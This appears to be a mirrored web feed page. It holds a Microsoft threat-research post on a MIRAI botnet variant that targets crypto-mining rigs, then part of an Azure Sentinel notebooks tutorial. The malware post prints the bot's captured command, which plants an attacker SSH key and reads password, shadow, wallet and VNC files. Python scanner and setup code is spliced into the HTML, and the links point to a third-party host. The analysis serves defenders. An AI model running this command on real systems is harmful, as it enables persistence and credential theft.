We’ve even <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/enabling-security-research-amp-hunting-with-open-source-iot/ba-p/1279037" target="_self">released large dumps of this kind of data</A> in the past to help other security researchers not affiliated with Microsoft.&nbsp;This year Microsoft has worked with MSc student Philip Thiede, supervised by Francesco Sanna Passino and Nick Heard at Imperial College, who have been developing innovative clustering approaches to explore this data for Philip's MSc thesis.</P> <P>&nbsp;</P> <P>By clustering the data, we hoped to find similar groups and outliers. Early results of this process discovered an unusual MIRAI variant which looks to take over existing, perhaps legitimate, coin miner infrastructure. Historically we have seen extremely low levels of compromises from this bot, but a little searching reveals it <A href="#" target="_blank" rel="noopener">was first spotted in 2017</A>. It now seems to be trying to make a comeback.</P> <P>&nbsp;</P> <H2>The variant</H2> <P>MIRAI is a botnet usually seen brute forcing credentials for IoT and IoT-like devices and is mainly focused on protocols like SSH and Telnet. The bot in question, which we’ve named MinerFinder, starts by dropping an SSH key. 
This can be used to later gain access to the infected system in case the password is reset.</P> <P>&nbsp;</P> <P>If you have this SSH key in your authorized_keys file then you’ve been compromised.</P> <PRE>AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF</PRE> <P>Next, in typical MIRAI style, a command to be executed is wrapped in a magic constant that allows later parsing to be slightly easier. Here’s an example:</P> <PRE>echo '&lt;cmd7uname&gt;'; uname -a ; echo '&lt;/cmd7uname&gt;'</PRE> <P>Most MIRAI bots have a static constant which tends to give the variant its name. What’s interesting about this bot is that it seems to have improved significantly on the default MIRAI-esque command execution flow by using XML tags. This at least hints at some improved backend handling for this botnet.</P> <P>&nbsp;</P> <P>Fairly generic recon behaviour then follows. Yet unlike other MIRAI botnet attacks, the bot master is actively searching for specific coin miner configurations in specific locations, in this case in the ‘ethos’ directory. EthOS is a Linux distribution built specifically for mining Ethereum,&nbsp;Zcash and Monero. It looks like this distribution is of high interest to the attacker.</P> <P>At time of writing no other MIRAI variant or other Linux malware could be found specifically checking for this operating system – at least in this way.</P> <P>&nbsp;</P> <P>In the final stages of the attack the bot tries to gain root privileges with ‘sudo’ and inspect the status of the firewall. 
Again, this kind of probing is unusual given the large number of MIRAI variants Microsoft has seen in the past.</P> <P>Of the few hundred brute force attacks we’ve seen, only two user accounts were attempted: ‘admin’ and ‘osmc’. Most MIRAI bots try a large number of common user accounts. The ‘osmc’ account is probably related to the OSMC media player project, which uses ‘osmc’ as a <A href="#" target="_blank" rel="noopener">default username / password combination</A>.</P> <P>&nbsp;</P> <P>MIRAI reconnaissance payloads are often followed by a second-stage infection that installs malware which continues the pattern of brute forcing. In these cases we didn’t see any further activity from the IPs that launched the attack, nor any logins with the brute-forced credentials from other IP addresses. Our assumption is that the actor is only interested in specific coin mining infrastructure.</P> <P>&nbsp;</P> <H2>The attack</H2> <P>Here is an example of the attack we collected.</P> <PRE>mkdir -p /home/admin/.ssh/ ; echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2kJY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5ElH997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/70sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwEaaMI25zP5QsF &gt;&gt; /home/admin/.ssh//authorized_keys ; echo '&lt;cmd7uname&gt;'; uname -a ; echo '&lt;/cmd7uname&gt;&lt;cmd7uptime&gt;'; uptime ; echo '&lt;/cmd7uptime&gt;&lt;cmd7w&gt;'; w ; echo '&lt;/cmd7w&gt;&lt;cmd7who&gt;'; who ; echo '&lt;/cmd7who&gt;&lt;cmd7last&gt;'; last ; echo '&lt;/cmd7last&gt;&lt;cmd7lastlog&gt;'; lastlog ; echo '&lt;/cmd7lastlog&gt;&lt;cmd7authkey&gt;'; cat /home/admin/.ssh//authorized_keys ; echo '&lt;/cmd7authkey&gt;&lt;cmd7lshome&gt;'; ls -la /home ; echo '&lt;/cmd7lshome&gt;&lt;cmd7passwd&gt;'; cat /etc/passwd ; echo '&lt;/cmd7passwd&gt;&lt;cmd7shadow&gt;'; sudo -n cat /etc/shadow ; 
echo '&lt;/cmd7shadow&gt;&lt;cmd7psfaux&gt;'; ps -faux ; echo '&lt;/cmd7psfaux&gt;&lt;cmd7netstat&gt;'; netstat -npta ; echo '&lt;/cmd7netstat&gt;&lt;cmd7arpan&gt;'; /usr/sbin/arp -an ; echo '&lt;/cmd7arpan&gt;&lt;cmd7ifconfig&gt;' ; /usr/sbin/ifconfig ; echo '&lt;/cmd7ifconfig&gt;&lt;cmd7localconf&gt;'; cat /home/ethos/local.conf ; echo '&lt;/cmd7localconf&gt;&lt;cmd7remoteconf&gt;' ; cat /home/ethos/remote.conf ; echo '&lt;/cmd7remoteconf&gt;&lt;cmd7rclocal&gt;' ; cat /etc/rc.local ; echo '&lt;/cmd7rclocal&gt;&lt;cmd7claymorestub&gt;'; cat /home/ethos/claymore.stub.conf ; cat /hive-config/rig.conf; cat /hive-config/wallet.conf ; cat /hive-config/vnc-password.txt ; echo '&lt;/cmd7claymorestub&gt;&lt;cmd7claymorezstub&gt;' ; cat /home/ethos/claymore-zcash.stub.conf ; echo '&lt;/cmd7claymorezstub&gt;&lt;cmd7sgminerconf&gt;' ; cat /var/run/ethos/sgminer.conf ; echo '&lt;/cmd7sgminerconf&gt;&lt;cmd7iptables&gt;' ; sudo -n iptables -S&nbsp; &amp;&amp; sudo -n iptables -t nat -S ; echo '&lt;/cmd7iptables&gt;&lt;cmdcrontab&gt;'; crontab -l; echo '&lt;/cmdcrontab&gt;' ; exit</PRE> <P>&nbsp;</P> <H2>Results</H2> <P>Clustering Linux malware installation patterns to help defenders rapidly understand new threats is an approach that Microsoft is continuing to support. Improving the speed and agility of defenders is key for the detection community as well as for our own Linux detection products, Azure Defender and <A href="#" target="_blank" rel="noopener">Azure Defender for IoT</A>. 
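Two checks a defender might want after reading the attack above, written here as an added example that is not part of the original post: a scan of authorized_keys content for the key the bot drops (matching on the key body, so a different comment field or a leading options field does not hide it, and reporting the SHA256 fingerprint in the form ssh-keygen -lf prints), and a parser for the tag-wrapped output format. The key is the one published above; the authorized_keys lines and the bot output below are constructed samples.

```python
"""Check authorized_keys for the MinerFinder key and parse the bot's tag-wrapped output.

Added example, not code from the original post. MINERFINDER_KEY is the key
body the post publishes; SAMPLE_AUTHORIZED_KEYS and SAMPLE_BOT_OUTPUT are
constructed samples.
"""
import base64
import hashlib
import re
import struct

# Public key body the bot appends to ~/.ssh/authorized_keys (copied from the post).
MINERFINDER_KEY = (
    "AAAAB3NzaC1yc2EAAAADAQABAAABAQC6apTpBLxylca9D2EVjfr8xa6OadS2"
    "c0oR4RYLkJiIp2XoWkJKqxVodz0s2gfQrMb9qr3oJQVoT4M1WHd829D5Wu2k"
    "JY4RMFSo+Rb2dszg0PQJ5Ug1pEW1DedYR379sjoIiF/qbaDzq3FtkUx9+5E/"
    "BiqdMGyncml3yinN6HuNH+Fnhv6TtS45Re6gI1rA21qFguBF5U3yPFKeF5El"
    "H997x/0rf3Qr01v38F2994IEXZ3fiaZTkw7k/ul9CnuCuIlCkPGeO7xkpR/7"
    "0sU077scxbArlCe/ch5BSBK9u8nOCBUBV7AlgZ9RojfTp/wbqqg20zfB7pwE"
    "aaMI25zP5QsF"
)

KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def _ssh_strings(raw):
    """Iterate over the length-prefixed fields of an SSH public key blob."""
    offset = 0
    while offset < len(raw):
        (length,) = struct.unpack(">I", raw[offset:offset + 4])
        offset += 4
        yield raw[offset:offset + length]
        offset += length


def describe_key(body):
    """Return (key_type, modulus_bits) decoded from the blob; bits is None for non-RSA keys."""
    fields = list(_ssh_strings(base64.b64decode(body, validate=True)))
    key_type = fields[0].decode("ascii")
    if key_type != "ssh-rsa":
        return key_type, None
    # ssh-rsa blob layout: type string, exponent e, modulus n (big-endian mpints)
    return key_type, int.from_bytes(fields[2], "big").bit_length()


def fingerprint(body):
    """SHA256 fingerprint in the form ssh-keygen -lf prints (unpadded base64)."""
    digest = hashlib.sha256(base64.b64decode(body, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def iter_authorized_keys(text):
    """Yield (line_no, key_type, body) for each key line.

    Blank lines and comments are skipped. A leading options field such as
    command="..." or no-pty may contain quoted spaces, so the key type is
    located by scanning tokens rather than assuming a fixed column."""
    for line_no, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        tokens = stripped.split()
        for i, tok in enumerate(tokens[:-1]):
            if tok.startswith(KEY_TYPE_PREFIXES):
                yield line_no, tok, tokens[i + 1]
                break


def find_ioc_keys(text, ioc_bodies=(MINERFINDER_KEY,)):
    """Return [(line_no, key_type, fingerprint)] for every line carrying an IOC key body."""
    return [(n, t, fingerprint(b)) for n, t, b in iter_authorized_keys(text) if b in ioc_bodies]


# One tag pair per command, as in the captured attack: <cmd7uname>...</cmd7uname>
TAG_RE = re.compile(r"<(cmd[0-9A-Za-z]+)>(.*?)</\1>", re.S)


def parse_tagged_output(text):
    """Split the bot's tag-wrapped command output into {tag: output} (the backend-side parse)."""
    return {name: body.strip() for name, body in TAG_RE.findall(text)}


# Constructed sample authorized_keys file: two legitimate keys, then the bot's line.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# keys for admin (constructed sample)",
    "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKE admin@laptop",
    'command="/usr/bin/rrsync /backup",no-pty ssh-rsa AAAAB3NzaC1yc2EFAKEFAKEFAKE backup',
    "ssh-rsa " + MINERFINDER_KEY,  # appended by the bot; note the missing comment field
])

# Constructed sample of what the bot's shell session would return.
SAMPLE_BOT_OUTPUT = (
    "<cmd7uname>Linux rig01 4.15.0-generic #1 SMP x86_64 GNU/Linux</cmd7uname>"
    "<cmd7uptime> 12:01:02 up 3 days,  2 users,  load average: 3.90, 3.85, 3.80</cmd7uptime>"
    "<cmd7localconf>proxywallet 0x0000000000000000000000000000000000000000\n</cmd7localconf>"
    "<cmd7shadow></cmd7shadow>"  # sudo -n failed, so nothing between the tags
)

if __name__ == "__main__":
    for line_no, key_type, fp in find_ioc_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"line {line_no}: {key_type} {fp} matches the MinerFinder key")
    for tag, output in parse_tagged_output(SAMPLE_BOT_OUTPUT).items():
        print(f"{tag}: {output!r}")
```

Run find_ioc_keys over the contents of each user's authorized_keys file; the fingerprint it reports is the same one ssh-keygen -lf prints, so it can be fed to an allow/deny list or a SIEM watchlist without shipping the full key around.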
Adding new SSH keys, crypto mining and unusual logins from suspicious IP addresses are already covered by <A href="#" target="_blank" rel="noopener">multiple existing detections</A>.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="alert.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/310817i2E1A66CB10DA880E/image-size/large?v=v2&amp;px=999" role="button" title="alert.png" alt="alert.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Microsoft’s Threat Intelligence Center proactively uses data sources and techniques such as those described here to discover emerging threats, as well as to ensure that our detection coverage is relevant to the attacks facing both Microsoft and its customers.</P> Fri, 17 Sep 2021 15:26:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/unusual-mirai-variant-looks-for-mining-infrastructure/ba-p/2756669 robeving 2021-09-17T15:26:09Z Azure Sentinel Notebooks Ninja Part 2: Getting Started with Azure Sentinel Notebooks https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-notebooks-ninja-part-2-getting-started-with-azure/ba-p/2716661 <P><EM><SPAN class="TextRun Highlight SCXW109037511 BCX8" data-contrast="none"><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">This installment is part of&nbsp;</SPAN><SPAN class="NormalTextRun CommentStart SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">a broader&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">learning&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">series to&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">help you become</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">&nbsp;a Jupyter Notebook ninja in Azure Sentinel</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" 
data-ccp-charstyle="Emphasis">.&nbsp;</SPAN><SPAN class="NormalTextRun SCXW109037511 BCX8" data-ccp-charstyle="Emphasis">The installments will be bite-sized to enable you to easily digest the new content.</SPAN></SPAN></EM><SPAN class="EOP SCXW109037511 BCX8" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 1:</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">What are notebooks and when&nbsp;do you need them</SPAN></A><SPAN data-contrast="auto">?</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 2:</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;How to get started with notebooks and tour&nbsp;the features&nbsp;–&nbsp;</SPAN><STRONG><I><SPAN data-contrast="auto">this&nbsp;post</SPAN></I></STRONG><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 3:&nbsp;</SPAN></STRONG><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="auto">Overview of the pre-built notebooks and how to use them</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="9" aria-setsize="-1" data-aria-posinset="4" 
data-aria-level="1"><STRONG><SPAN data-contrast="auto">Part 4:&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">How to create your own notebooks from scratch and how to customize the existing ones</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <H2><SPAN data-contrast="none">Getting Started with Azure Sentinel Notebooks</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:1,&quot;335559739&quot;:400,&quot;335559740&quot;:400}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-contrast="auto">As we discussed in&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Part 1</SPAN></A><SPAN data-contrast="auto">&nbsp;of this series, the Jupyter Notebook service is a powerful tool and an integral part of Azure Sentinel. It provides additional capability to help augment areas where Azure Sentinel may not scale as well.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Through our discussions with customers, we’ve noted that many have expressed interest in learning more about this topic. Most importantly, many want to know how to incorporate notebooks into their daily regimen to improve SOC workflows through enhanced investigation, threat hunting, and machine learning.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">If you’ve never used Jupyter notebooks before, they can feel daunting and a bit like a black box.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> 
<P><SPAN data-contrast="auto">Many of our pre-built notebooks rely on a Python library called&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><I><SPAN data-contrast="none">MSTICPy</SPAN></I></A><SPAN data-contrast="auto">. Originally developed by Microsoft to support Jupyter Notebook authoring for Azure Sentinel, MSTICPy (</SPAN><I><SPAN data-contrast="auto">Microsoft Threat Intelligence Python Security Tools</SPAN></I><SPAN data-contrast="auto">) is a Python library that addresses three primary requirements for security investigators and hunters: acquiring and enriching data, analyzing data, and visualizing data. MSTICPy reduces the amount of code that would otherwise have to be written using general-purpose Python libraries that aren’t tailored for security. While Azure Sentinel on its own provides the ability to do much of the same, Jupyter Notebooks with MSTICPy provide deeper functionality in the following specific areas:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Querying log data from multiple sources at once, including Azure Sentinel and external sources such as a data lake, blob storage, and third-party providers</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Enriching the data with Threat Intelligence, geolocations and Azure resource data</SPAN><SPAN 
data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="3" data-aria-level="1"><SPAN data-contrast="auto">Extracting Indicators of Activity (IoA) from logs and unpacking encoded data</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="4" data-aria-level="1"><SPAN data-contrast="auto">Performing sophisticated analysis such as anomalous session detection and time series decomposition</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="5" data-aria-level="1"><SPAN data-contrast="auto">Visualizing data using interactive timelines, process trees and multi-dimensional Morph Charts</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="11" aria-setsize="-1" data-aria-posinset="6" data-aria-level="1"><SPAN data-contrast="auto">Time-saving notebook tools such as widgets to set query time boundaries, select and display items from lists, and configure the notebook environment</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}">&nbsp;</SPAN></LI> </UL> <P><SPAN data-contrast="auto">The best way to get started is to become comfortable with a few of the “quick start” notebooks that we provide as part of the Azure Sentinel out-of-the-box experience. In 
this blog post, we introduce the Getting Started Guide notebook that is supplied with Azure Sentinel.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Understanding how MSTICPy fits into the Azure Sentinel notebooks is important: most Azure Sentinel notebooks start with a cell that defines the minimum Python and MSTICPy versions, installs the latest version of MSTICPy if needed, and then runs the&nbsp;<EM>init_notebook</EM>&nbsp;function. See the&nbsp;</SPAN><I><SPAN data-contrast="auto">More reading/tutorial resources</SPAN></I><SPAN data-contrast="auto">&nbsp;section at the bottom of this blog post for the steps to accomplish this and more.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <H2><SPAN data-contrast="none">Take a Tour</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:1,&quot;335559739&quot;:400,&quot;335559740&quot;:400}">&nbsp;</SPAN></H2> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Our Docs team is second to none. 
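Before the tour, here is the initialization cell described under Getting Started above, written out as an added example: this is not code from the Azure Sentinel notebooks or from MSTICPy, it reproduces the steps the text describes (check the Python and MSTICPy versions, upgrade MSTICPy with pip if needed, then call init_notebook). The minimum versions are assumptions, and the import path msticpy.nbtools.nbinit is the MSTICPy 1.x location of init_notebook.

```python
"""Version-gate and initialization cell for an Azure Sentinel notebook.

Added example, not code from the notebooks or from MSTICPy. REQ_PYTHON_VER and
REQ_MSTICPY_VER are assumed minimums; adjust them to the release you target.
"""
import re
import subprocess
import sys
from importlib.metadata import PackageNotFoundError, version as installed_version

REQ_PYTHON_VER = (3, 8)      # assumption: importlib.metadata needs Python 3.8 or later
REQ_MSTICPY_VER = (1, 4, 3)  # assumption: oldest MSTICPy release this notebook is written for


def parse_version(text):
    """'1.4.3' -> (1, 4, 3); a pre-release suffix such as '1.5.0rc2' counts as 1.5.0."""
    parts = []
    for piece in text.split("."):
        match = re.match(r"\d+", piece)
        parts.append(int(match.group()) if match else 0)
    return tuple(parts)


def version_at_least(installed, required):
    """Compare version tuples of unequal length by zero-padding the shorter one."""
    width = max(len(installed), len(required))

    def pad(v):
        return tuple(v) + (0,) * (width - len(v))

    return pad(installed) >= pad(required)


def msticpy_status(required=REQ_MSTICPY_VER, installed=None):
    """Return (meets_requirement, installed_version_text).

    installed=None reads the installed package metadata; pass a version string
    to evaluate a specific version without touching the environment."""
    if installed is None:
        try:
            installed = installed_version("msticpy")
        except PackageNotFoundError:
            return False, None
    return version_at_least(parse_version(installed), required), installed


def ensure_msticpy(required=REQ_MSTICPY_VER):
    """Install or upgrade MSTICPy with pip when it is missing or too old, as the notebooks do."""
    ok, _ = msticpy_status(required)
    if not ok:
        spec = "msticpy>=" + ".".join(str(n) for n in required)
        subprocess.check_call([sys.executable, "-m", "pip", "install", "--upgrade", spec])
    return msticpy_status(required)


def init_sentinel_notebook(namespace):
    """Gate on the Python version, make MSTICPy current, then run its init_notebook."""
    if sys.version_info[:2] < REQ_PYTHON_VER:
        raise RuntimeError("Python %d.%d or later is required" % REQ_PYTHON_VER)
    ok, installed = ensure_msticpy()
    if not ok:
        raise RuntimeError(f"MSTICPy {installed} does not meet the required version")
    from msticpy.nbtools.nbinit import init_notebook  # MSTICPy 1.x location
    return init_notebook(namespace=namespace)


if __name__ == "__main__":
    # As the first notebook cell: namespace=globals() lets init_notebook import
    # its standard set of names (pandas, widgets, data providers) into the notebook.
    init_sentinel_notebook(globals())
```

Keeping the version check separate from the install step means a notebook run on a locked-down kernel (no pip access) fails with a clear message about the installed version rather than a pip error.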
They have written thorough guidance on using the Getting Started notebook, covering running and initializing it, adding threat intelligence and GeoIP provider settings, running queries, and authenticating to your Azure Sentinel workspace from the notebook.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Use the following article on our Docs platform as a self-guided tour:&nbsp;&nbsp;</SPAN><A href="#" target="_self"><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">Tutorial: Get started with Jupyter notebooks and MSTICPy in Azure Sentinel</SPAN></A></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">We also have a video tutorial, Getting Started with Azure Sentinel ML Notebooks, which guides you through the basics of using notebooks for security analysis. 
It covers the steps you need to start using the notebooks provided with Azure Sentinel.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><LI-VIDEO vid="https://youtu.be/SaEQJfoe8Io" align="center" size="medium" width="400" height="225" uploading="false" thumbnail="https://i.ytimg.com/vi/SaEQJfoe8Io/hqdefault.jpg" external="url"></LI-VIDEO></SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><STRONG><SPAN data-contrast="auto">RECOMMENDED:</SPAN></STRONG><SPAN data-contrast="auto">&nbsp;<EM>After</EM>&nbsp;working through the&nbsp;“</SPAN><I><SPAN data-contrast="auto">Getting Started</SPAN></I><SPAN data-contrast="auto">”&nbsp;notebook to set up the Azure Sentinel notebook environment, consider digging directly into the “</SPAN><I><SPAN data-contrast="auto">A Tour of Cybersec notebook features</SPAN></I><SPAN data-contrast="auto">” notebook. This notebook walks through some of the features of Azure Sentinel notebooks and MSTICPy, introducing data queries, visualization, data analysis, enrichment with threat intelligence and pivot functions. 
It can be run against your Azure Sentinel workspace or standalone using sample data.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tour.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/307925i3F7496D7395ACF32/image-size/large?v=v2&amp;px=999" role="button" title="tour.png" alt="tour.png" /></span></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Notebooks, like all other Azure Sentinel components and features, are under constant review and improvement, driven by feedback and suggestions from our customers. Since our first blog post in this series, we’ve created a dedicated email distribution list (DL) for Azure Sentinel Notebooks. Use it to send your questions, issues, and feedback; our product teams monitor it and respond. The DL to use is&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">asinotebooks@service.microsoft.com</SPAN></STRONG><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Don’t forget to sign up to attend the upcoming public-facing,&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">free training series for Azure Sentinel Notebooks</SPAN></STRONG><SPAN data-contrast="auto">. For those who have already registered, the first session is scheduled for&nbsp;September 30, 2021. 
If you want to be included in additional training sessions, register using the form.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">To register visit <A href="#" target="_blank" rel="noopener">https://aka.ms/SecurityWebinars,</A> look for <STRONG>Azure Sentinel | Become a Notebooks ninja</STRONG> webinar and fill out the registration form.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We are super-excited to be bringing this series (and the training) to you! Look for more great knowledge on Azure Sentinel Notebooks as we prepare to deliver Part 3 of this series:&nbsp;</SPAN><I><SPAN data-contrast="auto">Overview of the pre-built notebooks and how to use them</SPAN></I><SPAN data-contrast="auto">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">More reading/tutorial resources:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"><A class="Hyperlink SCXW39567267 BCX8" href="#" target="_blank" rel="noopener noreferrer"><SPAN class="FieldRange SCXW39567267 BCX8"><SPAN class="TextRun Underlined SCXW39567267 BCX8" data-contrast="none"><SPAN class="NormalTextRun CommentStart SCXW39567267 BCX8" data-ccp-charstyle="Hyperlink">Getting Started with Jupyter Notebooks in Azure 